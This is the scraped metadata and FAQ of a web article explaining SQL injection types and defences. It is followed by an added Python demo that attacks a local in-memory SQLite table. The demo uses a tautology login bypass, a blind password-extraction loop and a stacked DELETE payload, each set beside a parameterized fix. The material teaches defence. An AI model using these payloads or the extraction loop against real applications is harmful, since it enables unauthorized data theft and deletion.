What SQL injection is, how it works, and what ways exist to protect your site from attacks.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/securitybriefing.net\/ro\/securitate\/sql-injection-101-ce-este-sqli-si-cum-sa-previi-atacurile\/","og_locale":"ro_RO","og_type":"article","og_title":"What is SQLi and How to Prevent Attacks | securitybriefing","og_description":"Learn the basics of SQL injection: what it is, how it works, and how to protect your site from attacks.","og_url":"https:\/\/securitybriefing.net\/ro\/securitate\/sql-injection-101-ce-este-sqli-si-cum-sa-previi-atacurile\/","og_site_name":"Security Briefing","article_published_time":"2022-08-06T22:53:54+00:00","og_image":[{"width":558,"height":500,"url":"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png","type":"image\/png"}],"author":"security","twitter_card":"summary_large_image","twitter_misc":{"Written by":"security","Estimated reading time":"11 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#article","isPartOf":{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/"},"author":{"name":"security","@id":"https:\/\/securitybriefing.net\/#\/schema\/person\/e99d7bfcfc8ecee5ed34ef3f0416ee81"},"headline":"SQL Injection 101: What is SQLi and How to Prevent 
Attacks","datePublished":"2022-08-06T22:53:54+00:00","mainEntityOfPage":{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/"},"wordCount":2130,"publisher":{"@id":"https:\/\/securitybriefing.net\/#organization"},"image":{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#primaryimage"},"thumbnailUrl":"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png","articleSection":["Security"],"inLanguage":"ro-RO"},{"@type":["WebPage","FAQPage"],"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/","url":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/","name":"What is SQLi and How to Prevent Attacks | securitybriefing","isPartOf":{"@id":"https:\/\/securitybriefing.net\/#website"},"primaryImageOfPage":{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#primaryimage"},"image":{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#primaryimage"},"thumbnailUrl":"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png","datePublished":"2022-08-06T22:53:54+00:00","description":"Learn the basics of SQL injection. 
What SQL injection is, how it works, and what ways exist to protect your site from attacks.","breadcrumb":{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#breadcrumb"},"mainEntity":[{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826159348"},{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826187832"},{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826216670"},{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826245103"},{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826275267"},{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826301781"},{"@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826330814"}],"inLanguage":"ro-RO","potentialAction":[{"@type":"ReadAction","target":["https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/"]}]},{"@type":"ImageObject","inLanguage":"ro-RO","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#primaryimage","url":"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png","contentUrl":"https:\/\/securitybriefing.net\/wp-content\/uploads\/2022\/08\/sql-injection.png","width":558,"height":500,"caption":"sql 
injection"},{"@type":"BreadcrumbList","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/securitybriefing.net\/"},{"@type":"ListItem","position":2,"name":"SQL Injection 101: What is SQLi and How to Prevent Attacks"}]},{"@type":"WebSite","@id":"https:\/\/securitybriefing.net\/#website","url":"https:\/\/securitybriefing.net\/","name":"Security Briefing","description":"Read cybersecurity news, online safety guides, cyber threat updates, and use free security tools from Security Briefing.","publisher":{"@id":"https:\/\/securitybriefing.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/securitybriefing.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"ro-RO"},{"@type":"Organization","@id":"https:\/\/securitybriefing.net\/#organization","name":"Security Briefing","url":"https:\/\/securitybriefing.net\/","logo":{"@type":"ImageObject","inLanguage":"ro-RO","@id":"https:\/\/securitybriefing.net\/#\/schema\/logo\/image\/","url":"https:\/\/securitybriefing.net\/wp-content\/uploads\/2023\/06\/security-briefing-logo-5.png","contentUrl":"https:\/\/securitybriefing.net\/wp-content\/uploads\/2023\/06\/security-briefing-logo-5.png","width":256,"height":70,"caption":"Security 
Briefing"},"image":{"@id":"https:\/\/securitybriefing.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/securitybriefing.net\/#\/schema\/person\/e99d7bfcfc8ecee5ed34ef3f0416ee81","name":"security","image":{"@type":"ImageObject","inLanguage":"ro-RO","@id":"https:\/\/securitybriefing.net\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/f882f35c703c897d1ec76c380b39ceed3f7309182d44a3177612bc192f6c9ddb?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f882f35c703c897d1ec76c380b39ceed3f7309182d44a3177612bc192f6c9ddb?s=96&d=mm&r=g","caption":"security"},"description":"admin is a senior staff writer for Government Technology. She previously wrote for PYMNTS and The Bay State Banner, and holds a B.A. in creative writing from Carnegie Mellon. She\u2019s based outside Boston.","sameAs":["http:\/\/securitybriefing.net"],"url":"https:\/\/securitybriefing.net\/ro\/author\/security\/"},{"@type":"Question","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826159348","position":1,"url":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826159348","name":"What is the most common SQL injection?","answerCount":1,"acceptedAnswer":{"@type":"Answer","text":"In-band SQL injection is the most common type of SQL injection attack. 
It occurs when an attacker can use the same communication channel to deliver the payload and gather results.","inLanguage":"ro-RO"},"inLanguage":"ro-RO"},{"@type":"Question","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826187832","position":2,"url":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826187832","name":"What is the best defense against SQL injection?","answerCount":1,"acceptedAnswer":{"@type":"Answer","text":"The best defense against SQL injection is to use parameterized queries (prepared statements). The statement is sent to the database with placeholders, and the user-supplied values are bound to those placeholders separately, so the database always distinguishes code from data and the input can never change the structure of the query. Escaping or filtering input is a weaker fallback, and a least-privilege database account limits the damage if an injection is still found.","inLanguage":"ro-RO"},"inLanguage":"ro-RO"},{"@type":"Question","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826216670","position":3,"url":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826216670","name":"How is SQL injection detected?","answerCount":1,"acceptedAnswer":{"@type":"Answer","text":"SQL injection can be detected in several ways. One option is a web application firewall (WAF), a hardware or software filter that sits between the web application and the internet. 
It inspects requests for known injection patterns and can block many attacks, but it is a compensating control rather than a fix: the vulnerable query must still be corrected. Injection flaws are also found through code review, automated security testing, and by monitoring database error messages and unexpected queries in the application and database logs.","inLanguage":"ro-RO"},"inLanguage":"ro-RO"},{"@type":"Question","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826245103","position":4,"url":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826245103","name":"What is second-order SQL injection?","answerCount":1,"acceptedAnswer":{"@type":"Answer","text":"Second-order SQL injection occurs when an attacker injects a payload that the web application stores safely at first (for example in a profile field) and executes later, when another part of the application reads the stored value and concatenates it into a query. This type of attack is harder to find and exploit because the input point and the vulnerable query are separated, and the attacker needs a way to trigger the code path that uses the stored value.","inLanguage":"ro-RO"},"inLanguage":"ro-RO"},{"@type":"Question","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826275267","position":5,"url":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826275267","name":"What is blind SQL injection?","answerCount":1,"acceptedAnswer":{"@type":"Answer","text":"Blind SQL injection is an attack where the attacker does not directly see the results of their payload. Instead, they infer information from the application's behaviour, one bit at a time: a true-or-false condition that changes the page content (boolean-based), or a deliberate delay that changes the response time (time-based). 
This type of attack is slower to carry out but can be just as dangerous as other types of SQL injection, and it is routinely automated.","inLanguage":"ro-RO"},"inLanguage":"ro-RO"},{"@type":"Question","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826301781","position":6,"url":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826301781","name":"What is a stacked query?","answerCount":1,"acceptedAnswer":{"@type":"Answer","text":"A stacked (piggy-backed) query is a SQL injection technique where the attacker terminates the intended statement with a semicolon and appends a second statement of their own, such as an UPDATE, DELETE or INSERT. It only works when the database and the driver allow several statements in one call, but where it does, it lets the attacker run arbitrary statements rather than only read data, which makes it one of the most damaging forms of SQL injection.","inLanguage":"ro-RO"},"inLanguage":"ro-RO"},{"@type":"Question","@id":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826330814","position":7,"url":"https:\/\/securitybriefing.net\/security\/sql-injection-101-what-is-sqli-and-how-to-prevent-attacks\/#faq-question-1659826330814","name":"What is an error-based SQL injection?","answerCount":1,"acceptedAnswer":{"@type":"Answer","text":"Error-based SQL injection is an attack where the attacker crafts input that makes the database raise an error whose message contains the data they want, for example by forcing a type conversion of a query result. 
It depends on detailed database errors reaching the response, so suppressing verbose error messages closes this channel, although the underlying injection still has to be fixed.","inLanguage":"ro-RO"},"inLanguage":"ro-RO"}]}}}
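The FAQ entries above name parameterized queries as the main defence and describe in-band, blind and stacked injection as attack classes. The following script is an added example, not code from the original page or from the site, and it runs offline against a constructed in-memory SQLite table (the users, passwords and payloads are assumptions made for the demonstration). It places a deliberately vulnerable login beside its parameterized form, shows the in-band tautology bypass, recovers a password through the vulnerable query with a boolean-based blind oracle, and shows what a stacked query does once an API that accepts several statements is in play.

```python
import sqlite3
import string

# Constructed sample data: an assumption made for this example, not from the page.
SEED_USERS = [
    ("alice", "s3cret", "alice@example.com"),
    ("bob", "hunter2", "bob@example.com"),
]


def make_db():
    """Fresh in-memory SQLite database seeded with the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SEED_USERS)
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Deliberately vulnerable: the input is pasted into the statement text."""
    sql = ("SELECT username FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn, username, password):
    """Hardened: the statement is fixed, the values are bound to placeholders."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (username, password))]


def inband_bypass(conn):
    """In-band SQLi: a tautology plus a comment returns every user in the
    same response. The parameterized query treats the payload as a literal
    username and matches nothing."""
    payload = "' OR 1=1 --"
    return (login_vulnerable(conn, payload, "anything"),
            login_parameterized(conn, payload, "anything"))


def blind_extract_password(conn, username,
                           charset=string.ascii_letters + string.digits):
    """Boolean-based blind SQLi: nothing from the database is echoed, the
    attacker only learns 'row found' or 'no row', and rebuilds a value one
    character at a time from that single bit."""
    def oracle(condition):
        # Resulting WHERE: username = 'alice' AND (<condition>) --' AND ...
        return bool(login_vulnerable(conn, f"{username}' AND ({condition}) --", "x"))

    length = next(n for n in range(1, 65) if oracle(f"length(password)={n}"))
    recovered = ""
    for pos in range(1, length + 1):
        recovered += next(c for c in charset
                          if oracle(f"substr(password,{pos},1)='{c}'"))
    return recovered


def stacked_query_damage(conn):
    """Stacked query: a second statement appended after a semicolon.
    sqlite3's execute() refuses more than one statement per call (the
    exception class differs between Python versions), but an API that runs
    whole scripts, executescript() here, or a driver and database that allow
    stacked statements, executes the attacker's DELETE."""
    payload = "'; DELETE FROM users; --"
    sql = ("SELECT username FROM users WHERE username = '" + payload
           + "' AND password = 'x'")
    try:
        conn.execute(sql)
        single_statement_api_refused = False
    except Exception:
        single_statement_api_refused = True
    conn.executescript(sql)
    remaining = conn.execute("SELECT count(*) FROM users").fetchone()[0]
    return single_statement_api_refused, remaining


if __name__ == "__main__":
    db = make_db()
    print("in-band bypass (vulnerable, parameterized):", inband_bypass(db))
    print("blind extraction of alice's password:", blind_extract_password(db, "alice"))
    print("stacked query (refused by execute, rows left after executescript):",
          stacked_query_damage(db))
```

The blind oracle never sees a password in any response; it asks the vulnerable endpoint a few hundred yes-or-no questions, which is exactly the traffic pattern a detection rule for blind SQLi looks for (many near-identical requests differing in a substr or length expression). The parameterized form defeats all three payloads without any input filtering, because the payload text only ever reaches the database as a bound value.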